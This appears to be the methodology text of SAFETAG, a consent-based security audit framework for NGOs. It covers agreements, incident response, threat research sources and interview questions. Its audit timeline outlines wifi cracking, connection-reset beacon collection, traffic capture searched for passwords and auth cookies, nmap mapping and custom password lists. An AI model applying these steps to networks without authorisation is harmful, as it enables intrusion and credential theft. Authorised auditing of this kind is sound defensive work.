Assessment Plan

Summary

This component allows an auditor and host to come to an understanding of the level of access that an auditor will have, what is off limits, and the process for modifying the scope of the audit when new information arises. ^13,14 This component consists of a process where the auditor collaboratively creates an assessment plan with key members of the organization.

A core tenet of SAFETAG is building agency in organizations to improve their digital security. To that end, collaboratively creating an assessment plan with the organization helps to clarify not only the audit scope - from discussing what sensitive data may be exposed to what systems may be disrupted in the process of the audit - but it also helps reveal the ability of the organization to support and respond to the audit findings.

Overview

• Determine a point person for the audit and exchange contact information. ¹⁵
• Explain and get approval to the scope of audit from the host. ^16,17
• Agree to the time-line, location, and attendees of the on-site audit. ¹⁸
• Codify data security standards for audit communication and evidence handling. ¹⁹
• If funded externally, identify what should be reported to external funder. ²⁰

Materials Needed

• To use the SAFETAG Agreement Generator, a Debian-based Linux system with python and other requirements as detailed in the Agreement Generator README are required.

Considerations

• Consider the threat landscape of the organization when determining secure communications channels. This may require some pre-agreement work using parts of the Context Research methodology.
• In addition to the overall mandate to send information encrypted to the organization, also demand encrypted communication back from them. Failure to establish a secure planning channel also contributes towards a no-go situation by putting both the auditor and organization at risk.

Walkthrough

• An agreement signed by both parties outlining the scope of the audit including:
  • The start and end dates of the audit.
  • The location where the on-site audit will take place. ²¹
  • The responsibilities of the host staff.
  • The responsibilities of the auditor.
  • The host names and IP ranges of any services run by the organization. ²²
  • Emergency contact information for the organization. ²³
  • The procedure the auditor will follow when handling incidents. ²⁴
  • The data security standards for evidence handling and communication. ²⁵
• A liability waiver signed by the host organization. ²⁶
• Approval from any third parties. ²⁷

Auditors are encouraged to use, or at least reference, the SAFETAG Agreement Generator, a python script which provides a decision tree covering the above points, and builds a basic, clear-language agreement which can be translated and formalized as needed. Sample outputs and a diagram of the full decision tree are available in the "outputs" folder of the Agreement Generator repository. This replaces the draft agreement previously part of SAFETAG.

Recommendation

Confidentiality Agreement

Summary

Negotiate an agreement with the organization that outlines how an auditor will protect the privacy of the organization and the outcomes of the audit.

Overview

• Host provides auditor consent to conduct the agreed to scope of the audit in the form of a signed liability waiver. ²⁸

Materials Needed

Considerations

Walkthrough

See the Appendix for a DRAFT Engagement and Confidentiality Agreement. See also the in-progress SAFETAG Agreement Generator for more advanced and flexible "plain language" agreement text and guidance on selecting which clauses to include.

Recommendation

Incident Response and Emergency Contact

Summary

Incident Response setups up a procedure for identifying what counts as an incident during an audit, as well as incident handling and response in the event that auditor cause or uncover a security incident during the course of the assessment. ^29,30

It is important to know these procedures in handling incidents to protect data integrity and audit trail to be used for investigation and collection of information. ##### Overview

• Establish what severity counts as an "incident" for the organization
• Agree on primary and secondary points of contact and relevant contact information
• Agree on security protocols around incident response
• Create procedure for incident handling in the event that auditor cause or uncover an incident during the course of the assessment. ^31,32

Materials Needed

Considerations

• Having an established emergency contact through the agreement process is critical
• A clear understanding of the legal and technical context from the Context Research method will be critical in choosing how to proceed.
• Consider moving sensitive conversations to a separate, offsite location.

Walkthrough

What counts as an incident should be agreed with the organization's management during the agreement phase, and should include possibilities informed by the Context and Technical Research work.

Incidents can include problems such as insider threats, active remote access malware systems, or the discovery of physical surveillance of the office, as well as many other possibilities. The auditor must use their best judgement along the SAFETAG Auditor Code of Conduct, their agreement with the organization, personal ethics, legal reponsibilities, and balance this in the frame of the organization's context, capacity, and the need to in good faith gain the trust of the staff of the organization to fulfill a successful audit.

Malware / Remote Access

For the implementation of mitigation measures, you can refer the auditees to a third party. This may be the organization's IT staff, a rapid response helpline, a malware researcher, etc.

Some of the mitigation steps can be implemented by the user, following the instructions included in the Rapid Response Network's Digital First Aid Kit.

You should consider a compromise serious and coordinate an incident response if any of the following is happening:

• files are being leaked
• you have detected a keylogger or spyware in a device
• the infected device is critical for the organization

Possible mitigation steps are below. This step should not take more than 2 hours, and the auditor should coordinate the response, rather than carry it out themselves. The auditor should keep in mind the organization's capacity and be extremely careful when reformatting devices, as there may be critical programs which the organization does not have the installation media / license keys for any more, or critical data on the disk which did not come up in other discussions. Check to see if the organization has trustworthy operating system installation media and license keys. In almost every situation, these mitigations should be done post-audit so as to ensure the audit itself has time to complete and be thorough.

• if the device is not critical, avoid using the infected device and disable its ability to access the network until a thorough investigation has been completed
• In consultation with the organization and any IT staff, delete the hard disk content and reinstall the system
• if the forensic capture of the whole hard disk would take too long, and an investigation is needed, the hard disk can be replaced (See the Advanced Threats Method for further guidance)
• if reinstalling the system is not possible, the device should be replaced
• mobile devices can be reset to factory settings. After resetting to factory settings, make sure any app or data recovery is not including potential compromise vectors, such as browser extensions, malicious applications, etc. ___

Insider Threat

Insider Threat

Insider Threat refers to any threat to an organization that comes within or inside the organization. These can include (but not limited to)

- Employees
- Former employees
- Contractors
- Interns___

Active Surveillance

To be developed.

Travel Checklist

See the Appendix for a sample travel kit / checklist

Audit Timeline and Planning

Review these notes in preparation for the audit as you begin to map out your schedule. This provides a rough, suggested outline of how to schedule your time on site for a SAFETAG audit, and some reminders of the work you need to have completed before arriving in country.

Prepare for Uncertainty

The SAFETAG roadmap is a crisp, clear data flow of inputs to outputs. Reality, generally speaking, is less direct. There are a few core parts of the audit process that force action, but others are more flexible. Outcomes of your discussion and exploration of the network will also de-rail the process in impossible-to-predict ways. The pre-audit interviews and your own contexts research, research on the organization, and preparation are meant to give you the best possible idea of what situation you'll walk in to, but even with all of that, frankly, shit happens.

Before Travel

• Agreements, Scope, Risk Analysis
• Remote Research
• Openly sourced data: DNS, MX, Web, research via social media and google
• Revealed information via Skype / etc. (office IP address?), nmap
• Packing and Prep
• Visas / Travel planning
• Hardware packing
• Software (run updates) and dictionary list prep (local language dictionaries, plus creation of a custom password list based on website keywords, addresses, and dates)

First Day

Priorities for the first day include meeting staff (even, possibly especially, for the more technical auditor). There is a strong temptation to dive in and get started, but establishing connections with the staff - especially those you haven't met through interviews - is key. You may discover hidden sources of talent or resistance, historical information, and new parts of the infrastructure or practices and policies that you may not have yet found.

• Meet staff, discuss operations and plan interruptions with key staff
• In-person discussions of risks, challenges, fears, questions, and experiences around digital security
• (If relevant) Attempt to crack wifi without password knowledge
• Parallel, collect wifi beacons while not associated to any one network (sending connection resets).
• Once wifi password is obtained (through cracking or asking), start a capture of decrypted traffic and run it as long as possible for later analysis
• Map out the “visible” network (nmap)

Early steps

From a data-gathering point of view, the first steps are to try and access the wireless network by password guessing, but also to connect to the network and capture traffic for analysis overnight. This provides other views on the actual technology and services used on the network, different both from the management and IT view as well as other tools discussed by staff.

First or Second day

• Associate nmap scans, MAC addresses, and beacons with people and specific systems, plus servers/networking hardware
• Scans on the captured traffic for passwords, auth cookies, suspicious traffic, unencrypted connections

Further Days (on Location) The next day you’re on location, you have hopefully looked through the research data you gathered, and have some specific follow-up things to investigate. It’s also now time to start going through the audit tasks.

• Deeper dive into what hardware is connected and what it is doing
• Begin organizing vulnerabilities and tracking against the audit framework
• External audit tasks
• Internal audit tasks
• Physical audit tasks

Final Day (on Location)

• Discuss initial findings and responses
• Suggestions for follow-up training, resources to consult, and possibly targeted trainings for relevant staff (what is a secure password? How to communicate securely?)
• Discuss next steps: SAFETAG Report, connections to trainers, how to seek help

Exploration and check-ins

Throughout the entire audit, aggressively make time to engage with staff - stop for coffee, eat lunch with them, have conversations. This can be integrated in to other parts of the process, such as the user device assessments, as well as being completely independent and natural. Having better connections with staff will make the group exercises, especially the risk assessment work, flow much better.

Whenever you set off a scan (airodumping, nmap, openvas...) are good times to stand up and walk around.

Debrief and Setting Expectations

Largely covered in the debrief section, making time at the end of the (often hectic) audit week is very important to making sure the next few steps are absolutely clear in terms of timelines and communication protocols.

Clean up

If you have been using paper or post-it notes during the audit, be sure you securely destroy them (by shredding, burning, or tearing into small pieces) before you leave the site on the last day. By the same token, any digital reports should be stored on secure media and securely deleted from all other locations. See the operational security section and per-item notes for further details. Clean off any whiteboards used, and check any camera used to remove sensitive photos.

Follow up care and Reporting

See the reporting sections for specific details here, but a series of check-ins with the organization to support their ability to respond to any incidents, understand further topics from the debrief, and to help provide them a timeline to expect the final report is valuable in maintaining their engagement post-audit to support the needed changes.

Conduct Interviews

NOTE: Covered in full under Capacity Assessment

• Set up secure channels for communication
• Interview managerial staff
• Interview technical staff
• Use the Categories (at the end of the sample interview questions) to help scope which questions to ask
• Use the Capacity Assessment Cheat-Sheet to track topics you have covered
• Provide (and track) a time limit for each interview

Regional Context Research

Summary

This exercise focuses on research and re-confirmation of regional issues from general trends to specific legal restrictions and safety concerns, as well as current news and persistent challenges.

Overview

• Identify any legal risks associated with conducting the audit (Secure communications and storage, network forensics, device exploitation, digital security training.) ³³
• Determine the sensitivity of the type of work the organization conducts and if its work attracts additional potential threat actors.
• Identify potential adversaries not identified in interviews including domestic or international governments and other, non-state actors (organized crime, corporations, competition, etc).
• Identify capacity and willingness of potential adversaries to act against the organization.
• Has any organization or individual made specific threats, or demonstrated intention or mindset to attack on the organization or similar organizations?

Materials Needed

Considerations

• Use VPNs or Tor to search if conducting the search from a country that is highly competitive with the organization's country, or is known to surveil.
• Maintain data about any targeted attacks and attacks affecting the organization's line of work secure.

Walkthrough

Cross-check reports on regional threats facing organizations with their focus area.

• Targeted Threats
  • List all the relevant actors and their relationship with similar organizations.
  • List all present threats and upcoming threats to similar organizations.
  • List all documented instances of relevant actors carrying out these threats.
• Decentralized Threats
  • List all present threats and upcoming threats to similar organizations.
  • Identify the motivation for these threats.
  • List all documented instances of these threats being carried out.

Identify any legal risks associated with conducting the audit. Secure communications and storage, network forensics, device exploitation, digital security training.

• Identify any export/import controls that might put the auditor or the organization at risk.
• Identify any domestic laws and regulations that might put the auditor or the organization at risk.

Identify any infrastructural barriers to adopting digital security practices.

Explore the security landscape of hardware and software identified in interviews by conducting a basic vulnerability analysis.

Technical Context Research

Summary

This exercise focuses on research into the technical capacity of potential threat actors, including both historical attack data and any indicators of changes to their capacity. Auditors are encouraged to create a summary of their findings for inclusion in the audit report and for sharing (if operational security and the agreement with the organization permits) among trusted networks.

Overview

• Explore latest cyber security trends, focusing on the security landscape of organizational hardware and software identified in interviews. ³⁴
• Identify access to and ownership/centralized control of communications infrastructure.
• Identify and prepare for any infrastructural barriers
• Research known uses of surveillance, censorship, or malware in the country/region and/or affecting the organization's line of work
• Identify known technical threats and Advanced Persistent Threats impacting the region or type of work the organization conducts.
• Investigate current non-targeted digital threats affecting the region and/or type of organization.
• Investigate the top targeted digital threats facing organizations doing this work in this region / country.
• Identify any legal barriers associated with common audit recommendations (Secure communications and storage, network forensics, device exploitation, digital security training.) ³⁵

Materials Needed

Considerations

• Use VPNs or Tor to search if conducting the search from a country that is highly competitive with the organization's country, or is known to surveil.
• The regional or country focus of the report may reveal information about the acitivites of an auditor. If the report is to be shared, consider sharing in bulk or a significant time after any travel has been completed.
• If the report is to be shared, ensure your audit agreement with the organization covers and restrictions for sharing.

Walkthrough

Thoroughly research technical attack history for the country/region, with a focus on identifying attacks which may focus on the work of the organization. Auditors are advised to track both capability (known attacks and tools) and intent (attempts to aquire tools, changes in policies, public statements). For auditors who intend to share their research efforts, it is incredibly useful to include key quotes and data directly into relevant sections of this document, providing a reference or link back to the original report. This allows future reviewers to more immediately understand your assessment, what it has included and not, and incorporate new material.

It is useful to categorize the research into categories:

• Surveillance (Surveillance Technology, Encryption Regulation, Identity Tracking, Requests for User Information)
• Targeted Attacks (Targeting Ability, Technical Sophistication)
• Censorship and Connectivity (Network Ownership, Shutdowns, Targeted Censorship, Blocking apps, Blocking Circumvention)
• Seizure and Theft (Device Confiscation, Targeted Raids, Robbery/Theft)

Keep a separate running list for: * Targeted Populations (Are specific types of people targeted/surveilled due to their identity/race/background?) * Targeted Activities (Are specific activities abnormally targeted - e.g. protests, calls for government transparency, etc.?) * Sensitive Events (Are there specific historic/anniversary/holiday dates, upcoming elections (https://www.ndi.org/elections-calendar), or other known events to be noted?) * Sources and New Additions (What resources have you found, ?)

If the country(ies) of interest are in the Freedom on the Net report, you will be able to gather a great deal of baseline information across all the sections by reading through the relevant country reports. The key internet controls found in the Freedom on the Net report ( https://freedomhouse.org/report/key-internet-controls-table-2016 ) guided many of the categories used here, reducing the effort required to create a baseline report. More advanced reporting could include references to the CAPEC (Common Attack Pattern Enumeration and Classification) taxonomy, and auditors may also be interested in leveraging the STIX standard to better automate sharing and further research into specific threats using threat information sharing platforms.

Additional organizations which regularly release in-depth digital security focused country reports which are strongly recommended to review in creation of an assessment are listed below. These sources often link to their primary sources or other groups doing dedicated research on the country or topic for further research. In addition, sub-sections list topic-specific research ideas.

• Digital attacks and threat information affecting NGOs and media
• Freedom on the Net Report (Country Reports)
• Human Rights Watch
• Reporters Without Borders (http://12mars.rsf.org/2014-enand http://en.rsf.org/%5BFULL-COUNTRY-NAME%5D.html)
• Privacy International (site:https://www.privacyinternational.org/ "[COUNTRY]" filetype:pdf)
• Citizen Lab (site:https://www.privacyinternational.org/ "[COUNTRY]")
• Amnesty International site:http://www.amnestyusa.org/research/reports/ [TERM] [COUNTRY]

• Information Security and Cyber Threats sections of OSAC assessments https://www.osac.gov/Pages/ContentReports.aspx?cid=3

• Industry-wide news and data
• OODALoop: site:https://www.oodaloop.com [COUNTRY]
• Akami (Security) State of the Internet Report https://www.akamai.com/us/en/about/our-thinking/state-of-the-internet-report/global-state-of-the-internet-security-ddos-attack-reports.jsp

• Internet World Stats - Country Internet and Telecom Reports

Below are definitions and resources for the research categories which can help build out a country or regional assessment useful for the auditor, the organization, and for the broader organizational security community.

• Surveillance
• Surveillance Technology
  • Definition and Guiding Questions: Telecommunications network monitoring or surveillance technology in use. To what extent are providers of access to digital technologies required to aid the government in monitoring the communications of their users?
  • Useful Data Sources: https://sii.transparencytoolkit.org , Google Searches of Privacy international: site:https://www.privacyinternational.org/ "[COUNTRY]" filetype:pdf, Google Searches of Citizen Lab: site:https://citizenlab.org/ [TERM] [COUNTRY], Information Security and Cyber Threats sections of OSAC assessments
• Encryption Regulation
  • Definition and Guiding Questions: Encryption and/or secure communications and anonymity is limited or banned via regulation. Are users prohibited from using encryption software to protect their communications? Are there laws restricting the use of encryption and other security tools, or requiring that the government be given access to encryption keys and algorithms?
  • Useful Data Sources: https://www.gp-digital.org/world-map-of-encryption/, http://www.cryptolaw.org https://github.com/digitalfreedom, http://www.nationaldefensemagazine.org/archive/2013/August/pages/UseCautionWhenTravelingWithEncryptionSoftware.aspx http://www.infolawgroup.com/ , https://mlat.info/ , http://www.itu.int/en/ITU-D/Cybersecurity/Pages/Country_Profiles.aspx
• Identity Tracking
  • Definition and Guiding Questions: There are regulations requiring some form of identification tracking on telecommunication technology or online platforms, such as for purchase of a SIM card. Are users able to post comments online or purchase mobile phones anonymously or does the government require that they use their real names or register with the government? Are website owners, bloggers, or users in general required to register with the government?
  • Useful Data Sources: https://www.gp-digital.org/world-map-of-encryption/, http://www.cryptolaw.org https://github.com/digitalfreedom, http://www.itu.int/en/ITU-D/Cybersecurity/Pages/Country_Profiles.aspx
• Requests for User Information
  • Definition and Guiding Questions: The government requests user data from internet intermediaries like ISP’s, social media, and online services.
  • Useful Data Sources: Recent transparency reports from top and/or locally relevant service providers; see the following for listings: https://www.accessnow.org/transparency-reporting-index/ , http://thememoryhole2.org/blog/transparency-reports , http://jameslosey.com/post/114045240881/who-publishes-transparency-reports-a-list-of-the
• Targeted Attacks
• Targeting Ability
  • Definition and Guiding Questions: Host nation has in-house or commercially sourced capability to leverage the information from social media monitoring, arrests, or existing targeted attacks in conducting additional attacks such as phishing, pharming, or spear-phishing.
  • Useful Data Sources: Google Searches of Citizen Lab: site:https://citizenlab.org/ [TERM] [COUNTRY], https://targetedthreats.net/media/2-Extended%20Analysis-Full.pdf#page=23 , http://www.itu.int/en/ITU-D/Cybersecurity/Pages/Country_Profiles.aspx , http://www.kroll.com/en-us/intelligence-center/reports/global-fraud-report,Symantechttps://www.symantec.com/security-center/threat-report , https://www.symantec.com/security_response/publications/monthlythreatreport.jsp , https://www.symantec.com/connect/blogs, Awesome Threat Intel
• Technical Sophistication
  • Definition and Guiding Questions: Host nation has in-house or commercially sourced capability to maintain persistent access to targets over time and across platforms.
  • Useful Data Sources: https://sii.transparencytoolkit.org/ , APT Groups and Operations sheet (includes targets): https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/edit#gid=1864660085 , Google Searches of Citizen Lab: site:https://citizenlab.org/ [TERM] [COUNTRY],
• Censorship and Connectivity
• Connectivity and Network Ownership
  • Definition and Guiding Questions: Extent to which telecommunications networks and internet service providers are state owned or operated.
  • Useful Data Sources: https://freedomhouse.org/report-types/freedom-net , http://www.itu.int/en/ITU-D/Statistics/Pages/stat/default.aspx , ASNs: https://ipinfo.io/countries , DYN Research Reports site:http://research.dyn.com [COUNTRY], Akami State of the Internet Report https://www.akamai.com/us/en/our-thinking/state-of-the-internet-report/index.jsp , ITU Statistics http://www.itu.int/en/ITU-D/Statistics/Pages/default.aspx , Internet World Stats http://www.internetworldstats.com/
• Internet Shutdowns
  • Definition and Guiding Questions: The host nation is willing and able to obstruct access to the global Internet or mobile networks either in a specific region or nationwide
  • Useful Data Sources: https://www.accessnow.org/keepiton
• Targeted Censorship
  • Definition and Guiding Questions: Host nation is willing and able to use targeted censorship approaches (including DDoS) against specific websites. To what extent does the state employ legal, administrative, or other means to force deletion of particular content, including requiring private access providers to do so? To what extent does the state or other actors block or filter specific internet and other ICT content, particularly on political and social issues e.g. distributed denial of service attacks (DDoS) attacks, content removal requests, and legal take-downs
  • Useful Resources: https://explorer.ooni.torproject.org/world/ , https://www.herdict.org/explore/indepth , https://www.qurium.org/alerts/ , https://equalit.ie/category/deflect-labs/ , DYN Research Reports site:http://research.dyn.com [COUNTRY], Internet Monitor https://cyber.law.harvard.edu/research/internetmonitor
• Blocking Communications Apps and Platforms
  • Definition and Guiding Questions: Entire platforms temporarily or permanently blocked to prevent communication and information sharing.
  • Useful Data Sources: https://explorer.ooni.torproject.org/world/, Herdict, GreatFire (for China)
• Blocking Circumvention
  • Definition and Guiding Questions: Host nation is willing and able to disable the use of circumvention or secure communications technology.
  • Useful Data Sources: https://explorer.ooni.torproject.org/world/
• Seizure and Theft
• Device Confiscation
  • Definition and Guiding Questions: Likelihood of confiscation of user devices when interacting with security forces. E.g. When crossing borders, at internal checkpoints, or during detainment or arrest. See themes for "targeted individuals"
  • Useful Data Sources: See physical-security risk register and for information around border crossings.
• Targeted Raids
  • Definition and Guiding Questions: Likelihood of office raid and seizure of equipment by host nation. See project information for modifiers around "unwelcome themes," “environmental factors,” and “office being built / existing” as well as physical security risk register for risk of sanctioned office raids.
  • Useful Data Sources:
• Robbery/Theft
  • Definition and Guiding Questions: Likelihood of (non-host nation) theft of user or office devices
  • Useful Data Sources: OSAC reports https://www.osac.gov/Pages/ContentReports.aspx?cid=2 , Pinkerton Risk Index https://www.pinkerton.com/risk-index/ ,

Interviews

Summary

The auditor conducts interviews with various staff members to gather information on the organizations risks and capacity.

Q&A sessions are unabashedly white box aspects of a security assessment, and you will occasionally hear push-back along the lines of, "You wouldn't have found that thing if we hadn't told you about this other thing." Compelling black box findings certainly do have an advantage when it comes to persuasiveness, but obtaining them can be quite time-consuming, so relying exclusively on vulnerabilities that you can identify without "help" is generally a mistake in this resource-constrained sector.

Overview

• Set up secure channels for communication
• Interview managerial staff
• Interview technical staff
• Use the Categories (at the end of the sample interview questions) to help scope which questions to ask
• Use the Capacity Assessment Cheat-Sheet to track topics you have covered
• Provide (and track) a time limit for each interview

Materials Needed

Considerations

• If the auditor or organization believes that there is a good chance of surveillance on the channel you are communicating over, do the rest of the interview on a secured channel or in person where possible, though some information-gathering is critical to do before planning the audit. Inability to do so contributes towards a no-go situation.

Walkthrough

The questions below are roughly divided into categories for management, program staff, and technical staff. The questions for technical staff may be best asked of the manager or another point of contact. Within that section, there are specific questions that often only actual IT staff are likely to be able to answer. An auditor may find value in re-asking the same questions to multiple staff members. Specifically, however, the "Baseline Threat Identification Questions" should be asked of whoever the auditor feels most able or willing to answer them.

In all cases, the HCD Toolkit recommends that you "warm up the participant with questions they are comfortable with." ³⁶ -- balance this against not asking questions which you should already know from basic organizational research, followed with informative questions which "prompt bigger, even aspirational, thinking that they may not be accustomed to on a daily basis." ³⁷

• What is your position in the organization?
• What are your main responsibilities in this organization?
• What issues does the organization work on? (Provide an example if needed - examples below)
  • Human Rights
  • Transparency
  • Public Service Delivery
  • Health
  • Free Media and Information
  • Climate Issues
  • Gender Issues
  • Poverty Alleviation
  • Community Building
  • Peace promotion
  • Agricultural Development
  • Entrepreneurship
  • Water, Sanitation
  • Transportation
  • Disaster Relief
  • Other
  • No Specific Mandate
• Where does your organization have activities?
• Does the organization have activities in more than one (city/province/country/region)
• What kind of funding does you organization receive?
• How many projects is your organization currently managing?
• What is the organization’s working language? (for password dictionary)
• Why are you having the audit done?

Management and Baseline Questions

• Could you tell me, approximately, which percentage of the organization’s currently annual budget is dedicated to supporting the use of digital or mobile technology?
• Does the organization have its own office space?
• Does the organization have a domain name or brand identity that is used for all online communications?
• What other languages are used by the organization, formally or informally? (for password dictionary)
• In what language has your organization accessed online resources to support its work?
• How many paid, full-time staff does the organization employ?
• How many paid, part-time staff does the organization employ?
• How many unpaid workers, such as volunteers or interns work at least one day a month at the organization?
• Does the organization have a staff member responsible for working with digital or mobile technology? Yes, more than one
• Is this staff member responsible for any of the following areas:
  • Office IT infrastructure
  • Internet Presence or website
  • Outreach or communications
  • Managing programs
• Has turnaround in staff members been a problem for retaining technical capacity in your organization?
• How regularly do staff members of the organization travel outside of your country?
• Does the organization do any of the following activities when travelling internationally:
  • Run programs
  • Participate in events
  • Run trainings
  • Receive trainings
  • Fundraising

Go Specific

"Dig deeper on the challenge at hand & prompt with ‘what if’ scenarios."

• Is the manager aware that a test is about to be performed?

• What is the most important reason for your organization to exist? (Provide an example if needed - examples below)
  • To raise awareness in the organization's policy area.
  • To impact policy.
  • To improve policy.
  • To improve service delivery.
  • To change specific legislative or administrative governance structures.
  • To provide citizens with a greater voice in public affairs and deliberations.
  • To expose corruption or malfeasance.
  • No concrete strategic objectives.
• Does the organization provide services directly to individuals (for example health, educational or legal service?)
• What type of direct services does the organization provide? (provide an example if needed - examples below)
  • Legal Services
  • Health Services
  • Education Services
  • Water/Sanatation Services
  • Financial Services
  • Other Services

• Does the organization have a hierarchy for decision-making, according to which different people have different responsibilities and levels of authority?

Go Personal

"Dig deeper on the practices outside of work & prompt with ‘what if’ scenarios."

• Does the staff usually work remotely?
• Does the staff usually take their work devices home?
• Does the staff usually access organizational assets from personal devices? (Provide an example if needed - examples below)
  • Work email
  • Work social media accounts
  • Office network (VPN)
  • Shared files
• Does the staff usually attend out-of-office events? (Provide an example if needed - examples below)
  • Protests
  • Trainings
  • External meetings
  • Press conferences
• What time does the staff usually come in and get out of the office?
• How secure are the office surroundings?
• What are the common means of transportation used?

Program Staff Questions

For organizations with signficant online operations/programs, the following questions may be asked of the management point of contact and/or a program staff member.

• Does the organization primarily rely on digital media in its work?
• What digital tools does your organization use? (Examples follow)
  • Email
  • Email newsletters
  • Websites
  • Maintain blog or discussion fora, or another social media account(s)
  • Engage in online discussions and interactions on external sites
  • Maintain interactive websites
  • paid software (like microsoft office or basecamp) to manage the organization or projects
  • Free branded platforms (like google apps) to manage the organization or projects
  • digital or mobile tools to collect data or evidence
  • Digital or mobile tools to deliver health, financial, or other public services
  • Mass communication to mobile phones
  • security software (anti-virus, circumvention tools, etc)
  • disseminate information through third party sites and platforms.
  • Other
  • How many people of the organization’s staff currently use digital or mobile technology on a daily basis?
  • How many of the organization’s currently active projects would not be possible without the use of these media?
  • Has the organization used the internet (including online training, discussions or research) to get better at any of the following activities
    • Communicating with stakeholders and raising awareness on issues.
    • Keeping the organization and its staff safe.
    • Fundraising and developing the organization’s strategic focus.
    • Managing staff and organizational activities (such as payroll, hiring and other administration)
    • Measuring impact of programs.
  • What are the most important motivations for the organization to use these tools?
  • What data would create the greatest risk to the organization if exposed, corrupted, or deleted?
  • Does the organization have specific plans to increase their capacity to use digital or mobile technologies in their work
  • Which of the below factors are the three most significant obstacles to the efficient use of digital and mobile technology by your organization?
  • Limited skills of staff
  • Limited infrastructure for media or electricity.
  • Limited technical literacy and media use among staff
  • limited financial resources
  • Insufficient hardware or software
  • None
  • Other
  • don't know
  • How well do you believe your organization is able to identify appropriate digital and mobile technology tools for the organization’s work?
  • How well do you believe your organization is able to use appropriate digital and mobile technology tools for the organization’s work?
  • In what ways, if any, have you experienced that technology inhibits the organization’s work?
  • What new activities using digital or mobile technologies would the organization like to attempt in the future? Please give examples of programs, activities, or management functions

Technical Staff Questions

Ask these of the most technical staff member you are in touch with. If the organization has dedicated IT support, this section also includes specific questions for IT.

• Do the organization’s staff have access to computers for their work?
• How many staff members do not have access to their own computer or need to share computers with other?
• How many staff members use their personal devices to access organizational assets?
• How many staff members work remotely?
• What ways has the organization used any of the following methods to build skills and capacities for using digital or mobile technologies?
  • Local Training
  • Training in other countries
  • Online Training
  • Purchesing equiptment or hardware
  • hiring consultants
  • hiring staff or restructring human resources
  • devoting staff time to independant learning
  • participating in international events
  • searching and learning online
  • Other
  • None
• Have these efforts to increase capacity targeted specific staff members in the organization?
• Has the organization actively worked to strengthen its digital security in the last year?
  • (IF NO) Why did the organization not work to strengthen its digital security in the last year?
  • (IF YES) How has the organization work to strengthen its digital security in the last year? (Examples Follow)
  • Limited skills of staff
  • Limited infrastructure for media or electricity.
  • Limited technical literacy and media use among staff
  • limited financial resources
  • Insufficient hardware or software
  • None
  • Other
  • don't know
• Has turnaround in staff members been a problem for retaining technical capacity in your organization?
• Are there systems on the network which the client does not own, operate, or rely on, that may require additional approval to test?
• Does the organization communicate with its beneficiaries/members/sources?
  • How does the organization communicate with its beneficiaries/members/sources?
• Does the organization use any of these tools to maintain information about its members?
  • Paper lists
  • Mobile phone contact lists
  • Email contact lists
  • Spreadsheets
  • CRM (customer relationship management software)
  • Other
• What other tools does the organization use to maintain information about its members?
• I will now read a list of hardware tools you might be familiar with; From this list, could you please tell me about the three tools that are most important to the organization?
  • Desktop computers
  • Laptop Computers
  • Mobile Phones
  • Satellite Phones
  • Video Equiptment
  • Cameras
  • USB Dongles
  • Hard Drives
  • Servers
  • Audio Recorders
  • Web Cams
  • Wireless Routers
  • Other
• Other hardware that is important to the organization’s work? Please describe if needed
• How important you think each of these hardware tools is for achieving the organization’s strategic objectives?
• I will now read a list of software tools you might be familiar with; From this list, could you please tell me about the three tools that are most important in the daily work of your organization?
  • Social media
  • Blogging Platforms
  • Tools for creating and managing pictures or videos
  • Cloud Based collaboration applications
  • Budgeting Software
  • Tools for building and managing websites
  • project management software
  • Anti-virus software
  • tools for managing databases
  • Graphic design or visualization software
  • software to manage sms or mobile communication for groups
  • circumvention software
  • other
• Other software that is important to the organization’s work? Please describe if needed?

IT Only

• Are there any systems which could be characterized as fragile? (systems with tendencies to crash, older operating systems, or which are unpatched)
• Does the organization have a standard procedure for installing software? If so can they provide a list of the software they install?
• Is any system monitoring software in place?
• What are the most critical servers and applications?
• Do you use backups in your organization?
  • Are there any data/devices that are not backed up?
  • Are backups tested on a regular basis?
  • When was the last time the backups were restored?
• How many websites does your organization have?
• What are their URLs?
• Where are they hosted?
• How many wireless networks are in place at the organization?
• Is a guest wireless network used? If so:
• What type of encryption is used on the wireless networks?
• Does the organization implement filtering of MAC addresses?
  • If so, can they provide the list of MAC addresses?
  • If they don't filter MAC addresses, can they make a list of devices and MAC addresses connected to their local network?
• Does the guest network require authentication?
• Approximately how many clients will be using the wireless network?
• How many total IP addresses are being tested?
• How many internal IP addresses, if applicable?
• How many external IP addresses, if applicable?
• Are there any devices in place that may impact the results of audit scans such as a firewall, intrusion detection/prevention system, web application firewall, or load balancers?

Baseline Threat Identification Questions

• To your knowledge, how often do the below incidents occur in the geographic areas or issue areas in which your organization is active? Could you please tell me if you think they happen never, sometimes or often
  • The government lawfully intercepts information communicated by civil society or private person
  • The government lawfully confiscates equipment because of the information it contains
  • Government, public officials, non-state actors, police or security forces use digital or mobile technology to identify and target individuals for arrest or violen
  • Government, public officials, non-state actors, police or security forces use digital or mobile technology to attack the reputations of individuals or organizations
• To your knowledge, how often do the below actors use digital or mobile technology to target or to identify individuals for arrest or violence? Do they use it never, sometimes, or often?
  • government or public officials
  • non-state actors (corporations, social groups)
  • police, security forces or paramilitary groups
• And how often would you say that these actors use digital or mobile technology to monitor or gather information on civil society activities? Never, sometimes, or often?
  • government or public officials
  • non-state actors (corporations, social groups)
  • police, security forces or paramilitary groups
• What do you feel are the most immediate and serious digital threats to the organization?
• How much risk do you feel each of these digital threats presents to your organization?
  • Online surveillance
  • DDOS (Distributed Denial of Service) Attack
  • Targeted for physical violence on the basis of digital activity
  • Data loss
  • Other.
• Do you feel that any of these threats place the physical security of your staff in danger?
• Do you feel that any of these threats place the physical security of your stakeholders in danger?
• Do you feel that any of these threats place the physical security of your beneficiaries in danger?
• In the last six months, have you or any of your civil society peers experienced any of the following?
  • Intimidation or threats of violence by public officials, police or security force
  • Intimidation or threats of violence by private or non-state actors.
  • Threats of arrest or detention
  • Arrest
  • Threats of Torture.
  • Confiscation of equipment
  • Threats to administrative standing, such as stripping individuals of professional accreditation or organization of licenses
  • Other
• How has your organization responded to these threats?
  • Addressed the issue in the press/online
  • Told other organizations about the threat
  • Contacted the authorities
  • Trained staff to prevent and mitigate such threats in the future
  • Requested help from other organizations
  • Invested in hardware
  • raised funds
  • has not responded
  • other
• Has the organization taken any of the following steps to prepare against digital or physical threats?
  • Staff have been trained
  • There are specific plans in place for specific situations
  • Equiptment and/or supplies have been made ready
  • Other
• Does the organization experience power outages in its office
• Does the organization have access to the Internet in its offices?
• In the last month, has your organization lost access to Internet for reasons other than power outages
• What are the security threats in the office surroundings?
